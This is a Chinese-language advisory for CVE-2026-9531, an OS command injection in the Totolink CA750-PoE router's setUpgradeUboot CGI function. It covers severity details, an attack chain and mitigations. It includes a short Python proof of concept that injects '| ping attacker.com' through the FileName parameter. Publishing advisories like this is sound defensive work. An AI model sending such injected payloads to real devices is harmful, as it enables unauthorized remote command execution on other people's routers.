IPBUF安全漏洞报告
English
CVE-2026-9531 CVSS 6.3 中危

CVE-2026-9531 Totolink CA750-PoE OS命令注入漏洞

披露日期: 2026-05-26

漏洞信息

漏洞编号
CVE-2026-9531
漏洞类型
操作系统命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Totolink CA750-PoE

相关标签

OS命令注入RCETotolinkIoT路由器漏洞

漏洞概述

Totolink CA750-PoE 6.2c.510版本中存在操作系统命令注入漏洞。该漏洞位于/cgi-bin/cstecgi.cgi文件的setUpgradeUboot函数中,由于对FileName参数处理不当,攻击者可远程注入恶意OS命令,导致系统被控制。目前该漏洞利用代码已公开,风险中等。

技术细节

该漏洞源于Totolink CA750-PoE路由器Web管理界面的/cgi-bin/cstecgi.cgi脚本中setUpgradeUboot函数的代码缺陷。在处理用户提交的FileName参数时,程序未对输入进行严格的过滤或净化,直接将其传递给系统底层函数执行。攻击者可以通过发送特制的HTTP POST请求,在FileName字段中拼接Shell元字符(如;、|或&),从而诱骗服务器执行任意操作系统命令。由于攻击向量为网络(AV:N)且无需用户交互(UI:N),攻击者只需具备低权限(PR:L)即可利用此漏洞远程获取服务器权限,造成信息泄露、数据篡改或服务拒绝。

攻击链分析

STEP 1
侦查
攻击者扫描网络,识别暴露的Totolink CA750-PoE设备及其Web管理接口。
STEP 2
漏洞利用
攻击者向/cgi-bin/cstecgi.cgi发送特制的HTTP POST请求,在setUpgradeUboot函数的FileName参数中注入恶意命令。
STEP 3
命令执行
由于后端未过滤特殊字符,设备将恶意参数传递给系统Shell执行,导致攻击者获得执行OS命令的权限。
STEP 4
权限提升与控制
攻击者利用执行的命令进一步控制系统,安装后门、窃取数据或发动进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target-ip/cgi-bin/cstecgi.cgi" # Malicious payload to inject OS command (e.g., ping a test server) payload = "| ping attacker.com" # Construct the data payload data = { "function": "setUpgradeUboot", "FileName": payload } # Send the POST request response = requests.post(url, data=data) # Check response print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}")

影响范围

Totolink CA750-PoE 6.2c.510

防御指南

临时缓解措施
建议用户立即限制路由器Web管理界面的网络访问,将其置于防火墙后或仅允许内网访问。如果无需远程管理,请关闭相关服务。同时,应密切监控设备日志,检测是否存在异常的命令执行记录。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表